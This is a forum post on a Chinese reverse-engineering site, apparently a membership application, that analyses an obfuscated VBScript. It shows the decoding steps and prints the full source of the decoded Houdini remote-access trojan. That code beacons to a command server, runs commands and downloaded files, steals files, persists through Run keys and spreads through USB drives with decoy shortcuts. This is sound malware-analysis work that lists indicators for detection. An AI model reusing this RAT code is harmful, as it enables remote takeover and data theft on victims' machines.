申请会员 id:smldhz【申请通过】
1、申 请 I D:smldhz2、个人邮箱:
3、原创技术文章:
看到这个帖子https://www.52pojie.cn/thread-716901-1-1.html,想回复发现以前账号早就没了。这里写一下分析过程,能搞个账号最好,不能的话 @你有毒吧 童鞋来这里看分析吧。
首先下载 vbs 脚本,用 VS Code 打开,能看到的是一堆“乱码”,不过也有一定的规律。既然能正常执行,那么至少语法格式肯定是正确的:VBScript 允许用冒号把多条语句写在同一行,所以搜索冒号 ":" 替换为换行 "\n",能让代码看起来稍微清爽一点(字符串字面量里的冒号也会被一起替换,因此改过的文件只用来阅读,不要再拿去执行)。
然后搜索"(",能找到几处函数和调用,贴一下关键地方
' Layer 1: the single long literal (its bytes are mis-encoded in this paste) is
' the split delimiter; every fragment between delimiters is a decimal character
' code, and the rebuilt string is the next layer of script.
Ai4R2j1Q2k3P5l7O8m6N4n3M2=split(Ai4R2j1Q2k3P5l7O8m6N4n3M2,"8-f��A��**�����?��?��?�������?���?227596903�???��?�?/R8-f��A��**��297575474���?���?�???��?����?���?�???�259122682?���?�???��?�?/R8-")
' Stops at ubound - 1, so the final fragment (presumably the empty tail after the
' last delimiter) is never converted.
for A5l7O8=0 to ubound(Ai4R2j1Q2k3P5l7O8m6N4n3M2) -1
A1d2W3e4V5f6U7g5T4h8S9i=A1d2W3e4V5f6U7g5T4h8S9i & ChrW(Ai4R2j1Q2k3P5l7O8m6N4n3M2(A5l7O8))
next
把Ai4R2j1Q2k3P5l7O8m6N4n3M2字符串用后面的一长串字符来分割,得到的数字转成字符拼接到一起,按这个逻辑跑一遍 得到
' Opaque predicate: the guards in the decoder below compare against this exact
' value, so they are always true and only exist to look like control flow.
nTWAAKaqMncGOLE = "KcSqLBYLmrPGgXL" + ChrW(160)
' Layer-2 decoder: XOR each byte of the hex string ffLzcAEAXYFzttk with the key
' NMWZrwnYxTfZmaV (called with ChrW(63) = "?" below).  Numeric constants are hidden
' as characters that VBScript coerces back to numbers:
'   ChrW(49) = "1", ChrW(50) = "2", ChrW(38) & ChrW(72) = "&H".
Public Function YPcXDTqcWJAjkyz(NMWZrwnYxTfZmaV , ffLzcAEAXYFzttk )
' For i = 1 To Len(hex) / 2
For GGoBjvuWeIryKEA = ChrW(40 + 9) TO (sjDhJwZgbCUrTGO(ffLzcAEAXYFzttk) / ChrW(25 + 25))
' byte = Eval("&H" & Mid(hex, 2*i - 1, 2))
rjjHfVnrNbUrHmS = IzPqzmyebBLAxJy(ChrW(30 + 8 )& ChrW(70 + 2) + (MID(ffLzcAEAXYFzttk, (ChrW(40 + 10) * GGoBjvuWeIryKEA) - ChrW(40 + 9), ChrW(60 -10))))
' keybyte = Asc(Mid(key, (i Mod Len(key)) & "1", 1)); the "&" is string
' concatenation, so with a one-character key the index is "01" -> position 1 every time.
SJDGzcxYdFDRtJy = ASC(MID(NMWZrwnYxTfZmaV, ((GGoBjvuWeIryKEA Mod sjDhJwZgbCUrTGO(NMWZrwnYxTfZmaV)) & ChrW(40 +9)), ChrW(40 + 9)))
' Always true: nTWAAKaqMncGOLE is assigned exactly this value at the top of the layer.
if nTWAAKaqMncGOLE ="KcSqLBYLmrPGgXL" + ChrW(160) then
jUtslSFfKIqWNav = jUtslSFfKIqWNav + ChrW(rjjHfVnrNbUrHmS XoR SJDGzcxYdFDRtJy)
end if
Next
YPcXDTqcWJAjkyz = jUtslSFfKIqWNav
End Function
' Thin wrapper so the obfuscator never has to write the word "Eval" at the call site.
Function IzPqzmyebBLAxJy (CcRvOWqsCUejGXf)
IzPqzmyebBLAxJy = Eval (CcRvOWqsCUejGXf)
end Function
' Thin wrapper around Len; hides the builtin's name from a casual grep, nothing more.
Function sjDhJwZgbCUrTGO (MloZCRGnuGUMUHS)
sjDhJwZgbCUrTGO = Len (MloZCRGnuGUMUHS)
end Function
' Layer-2 entry.  The guard is the same opaque predicate as in the decoder and is
' always true.  Rebuilds the hex payload, pauses, decodes it with the one-byte
' key "?" (ChrW(63)) and Execute()s the result — the houdini script below.
if nTWAAKaqMncGOLE ="KcSqLBYLmrPGgXL" + ChrW(160) then
nFattSGfzkORuQE = ""
' The real hex chunks are elided as "xxxx" in this post.
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
' One-second delay before the payload runs.
Wscript.Sleep 1000
' Swap Execute for a file write to dump this layer instead of running it.
Execute (YPcXDTqcWJAjkyz ( ChrW(63),nFattSGfzkORuQE))
dIm nsTeqFJRvCeWtsf
end if
篇幅关系把nFattSGfzkORuQE 后面的一堆hex字符用xxxx代替了
看到有个Execute,说明至少解密了一层了,要继续解密得先用YPcXDTqcWJAjkyz函数解一层,直接把execute替换成写文件
' Analyst's dump helper: same decode call as the original, but the result is
' written to output.vbs (created/overwritten, ASCII) instead of being Execute()d.
Set fso = CreateObject("Scripting.FileSystemObject")
Set dumpFile = fso.CreateTextFile("output.vbs", True)
dumpFile.Write YPcXDTqcWJAjkyz(ChrW(63), nFattSGfzkORuQE)
dumpFile.Close
打开output.vbs发现已经是解密完了,原始文件前前后后那么多的 随机字符串=随机字符串 只是掩护罢了,并没有实际作用的样子。
附上解密完的脚本
' Stage-2 payload as dumped to output.vbs by the decoder above.  Left byte-for-byte
' as pasted (the paste lost some spaces, e.g. "theninstalldir" = "then installdir",
' "ifdrive" = "if drive", "foreach" = "for each"); annotations only.  Do not run.
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
' C2 endpoint; post(), download() and upload() all build "http://" & host & ":" & port & "/" & <cmd>.
host = "txxxxtno.publicvm.com"
port = 5054
' Install directory, expanded below; falls back to %temp% if it does not exist.
installdir = "%appdata%"
' Switches for the removable-drive .lnk seeding done in install().
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
' The implant keeps whatever file name it was launched under for every copy it makes.
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) theninstalldir = shellobj.expandenvironmentstrings("%temp%") & "\"
' Field separator "<|>" used in both the beacon response and the exfil payloads.
spliter = "<" & "|" & ">"
' Beacon interval in milliseconds; the C2 "sleep" command overwrites it.
sleep = 5000
dim response
dim cmd
dim param
info = ""
' Set by instance() from the HKLM\software\<name> marker; reported in the User-Agent.
usbspreading = ""
startdate = ""
' Handle on the installed copy, opened in instance(); see the note there.
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
' Main beacon loop.  Errors are swallowed globally, so a failed POST simply
' yields an empty response, no case matches, and the loop sleeps and retries.
on error resume next
instance
while true
' Re-persist and re-seed removable drives on every iteration.
install
response = ""
' Beacon: POST /is-ready with the fingerprint from information() in the User-Agent.
' The reply is "<command><|><arg1><|><arg2>".
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
' Run arbitrary VBScript supplied by the C2 (misspelled "excecute" on the wire).
case "excecute"
param = cmd (1)
execute param
' Replace the installed copy with a new script body and relaunch it.
case "update"
param = cmd (1)
oneonce.close
set oneonce =filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
' Remove persistence, the drive copies and the .lnk decoys, then exit.
case "uninstall"
uninstall
' Fetch a file from the C2 (arg1 = remote name, arg2 = local dir) and run it.
case "send"
download cmd (1),cmd (2)
' Fetch a file from an arbitrary URL (arg1) into installdir as arg2 and run it.
case "site-send"
sitedownloader cmd (1),cmd (2)
' Exfiltrate the local file named in arg1.
case "recv"
param = cmd (1)
upload (param)
' Recon replies are POSTed back to /is-enum-driver, /is-enum-faf, ... as the body.
case"enum-driver"
post "is-enum-driver",enumdriver
case"enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case"enum-process"
post "is-enum-process",enumprocess
' Run a shell command and return its output.
case"cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
' Delete a file or folder.
case"delete"
param = cmd (1)
deletefaf (param)
' Kill a process tree by PID.
case"exit-process"
param = cmd (1)
exitprocess (param)
' Change the beacon interval; the argument goes through eval(), so it is itself code.
case"sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
' Persist (upstart) and seed every removable drive: copy the script to the drive
' root as hidden+system, then hide each file/folder there and drop a same-named
' .lnk that launches the script before opening the original item.
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
ifdrive.isready = true then
ifdrive.freespace> 0 then
' drivetype 1 = removable media (FSO DriveType constant).
ifdrive.drivetype= 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
iffilesystemobj.fileexists (drive.path & "\" & installname)then
' attributes 2+4 = Hidden + System.
filesystemobj.getfile(drive.path & "\"& installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
ifinstr (file.name,".") then
' Existing .lnk files are skipped; everything else is hidden and shadowed by a decoy.
iflcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
ifucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
' Decoy "<basename>.lnk": cmd.exe /c start <script> & start <original file> & exit,
' with a minimized window (windowstyle 7).
set lnkobj = shellobj.createshortcut (drive.path & "\"& filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
' Borrow the registered DefaultIcon for the file's extension so the decoy looks like the original.
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
ifinstr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
' Same trick for folders: the decoy runs the script, then opens the (now hidden) folder in explorer.
set lnkobj = shellobj.createshortcut (drive.path & "\"& foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
ifinstr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
' Undo persistence and the removable-drive seeding, then exit the process.
' scriptfullname is normally the installdir copy (instance() relaunches from
' there).  The HKLM\software\<name> marker written by instance() is not removed.
sub uninstall
on error resume next
dim filename
dim foldername
' Run keys written by upstart().
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
foreach drive in filesystemobj.drives
ifdrive.isready = true then
ifdrive.freespace> 0 then
ifdrive.drivetype= 1 then
foreach file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
ifinstr (file.name,".") then
iflcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
' Unhide the original and remove its decoy; the script copy itself is deleted.
file.attributes = 0
ifucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
' Any .lnk in the drive root is deleted outright (this also covers the folder decoys).
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
' Synchronous POST to http://host:port/<cmd>.  The victim fingerprint from
' information() travels in the User-Agent (header name literally "user-agent:",
' colon included).  Returns the response body, which the main loop parses as a command.
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
' Victim fingerprint sent as the User-Agent, built once and cached in the
' undeclared global "inf" ("ifinf" is "if inf" with the space lost in the paste):
'   hwid<|>computername<|>username<|>OS caption<|>"plus"<|>AV list<|>usbspreading
function information
on error resume next
ifinf = "" then
inf = hwid & spliter
inf = inf& shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf& shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
' Literal tag "plus"; presumably a build/variant marker — not referenced anywhere else in this script.
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
' Persistence: Run keys under HKCU and HKLM (the HKLM write presumably fails
' silently without admin rights, thanks to on error resume next), plus copies of
' the script in installdir and the Startup folder.
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B "& chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
' Victim identifier: the volume serial number of the first logical disk that has one.
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
ifdisk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
' Lists installed AV products via the WMI SecurityCenter/SecurityCenter2
' namespace (chosen by OS major version > 6), or "nan-av" if none are found.
' The version parsing is broken as written: the loop counter is "x" but the
' index used is "i", and "colitems.version" addresses the collection rather
' than an item; with on error resume next the result is whatever survives.
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
forx = 1 to ubound (versionstr)
osversion = osversion &versionstr (i)
next
' Intended: "6.1.7601" -> "6.17601" -> 6.17601 via eval; > 6 selects SecurityCenter2.
osversion = eval (osversion)
ifosversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security= security& objantivirus.displayname & " ."
next
if security= "" then security= "nan-av"
end function
' Startup bookkeeping.  Records in HKLM\software\<name> whether this copy was
' first launched from a drive root (X:\<name>, i.e. via the USB decoys), persists,
' and if not running from installdir relaunches the installed copy and exits.
' Finally opens the installed copy for append and quits on failure; together with
' the "update" handler's oneonce.close this appears to act as a single-instance lock.
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
' mid(scriptfullname, 2) = ":\<name>" only when the script sits in a drive root.
if lcase ( mid(wscript.scriptfullname,2)) = ":\" &lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort =filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =filesystemobj.getfile (installdir & installname)
' Compares 8.3 short paths, presumably so long/short name differences do not cause a relaunch loop.
iflcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
' mode 8 = ForAppending
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
iferr.number > 0 then wscript.quit
end function
' "site-send": GET fileurl, save it as installdir\filename (binary, via
' ADODB.Stream, replacing any existing file) and run it.
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
' type 1 = adTypeBinary
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
' Executes whatever landed on disk — no integrity or type check.
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
' "send": fetch a file from the C2 by POSTing to /is-sending<|><fileurl>.  The
' local name is the part of fileurl after the last "\", saved under filedir
' (installdir when empty) and then executed.
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
ifobjhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
' type 1 = adTypeBinary
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload= nothing
end if
' Runs the downloaded file unconditionally once it exists.
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
' "recv": exfiltrate a local file.  Reads fileurl as binary and POSTs the bytes
' to /is-recving<|><fileurl>.  The local "httpobj" shadows the global one.
function upload (fileurl)
dimhttpobj,objstreamuploade,buffer
setobjstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
' Copy-paste slip: releases objstreamdownload, not objstreamuploade.
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
' "enum-driver": "<path>|<drivetype><|>" for every ready drive.
function enumdriver ()
foreach drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
' "enum-faf": listing of enumdir, "<|>"-separated, prefixed by the path itself:
'   "<name>||d|<attributes>" for subfolders, "<name>|<size>|f|<attributes>" for files.
function enumfaf (enumdir)
enumfaf = enumdir & spliter
foreach folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
foreach file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size& "|" & "f" & "|" & file.attributes & spliter
next
end function
' "enum-process": "<name>|<pid>|<executablepath><|>" per Win32_Process entry.
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
' "exit-process": force-kill the process tree rooted at pid (Run window style 7,
' waits for taskkill to finish).  pid is pasted straight from the C2 into the
' command line, so it can carry extra taskkill arguments.
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
' "delete": tries the argument first as a file and then as a folder, ignoring errors.
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
' "cmd-shell": run cmd via %comspec% /c and return its stdout, or stderr when
' stdout is already at end-of-stream (only one of the two streams is ever read).
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
一个年代非常久远的 vbs 恶意代码(文件头自称 houdini),运行后默认每 5 秒向 txxxxtno.publicvm.com:5054 发 HTTP POST 获取进一步操作命令(远程执行脚本/命令、上传下载并运行文件、枚举进程和文件、自更新等)。从解密脚本里可直接提取的检测/清理线索:HKCU 与 HKLM 的 Run 键、启动文件夹和 %appdata%(不存在时退回 %temp%)下的同名副本、HKLM\software\<脚本名> 下的标记值,以及向可移动磁盘写入隐藏副本并用伪装成原文件/文件夹的 .lnk 做 U 盘传播的逻辑。百度搜索第一行的文字('<[ recoder : houdini (c) skype : houdini-fx ]>')可以看到有很多分析,这里就不继续了
I D:smldhz
邮箱:smldhz@qq.com
申请通过,欢迎光临吾爱破解论坛,期待吾爱破解有你更加精彩,ID和密码自己通过邮件密码找回功能修改,请即时登陆并修改密码!
登陆后请在一周内在此帖报道,否则将删除ID信息。
ps:登录后可以把文章整理到病毒分析区。 报道报道,感谢通过:lol @Hmily 是否可以隐藏邮箱信息,麻烦了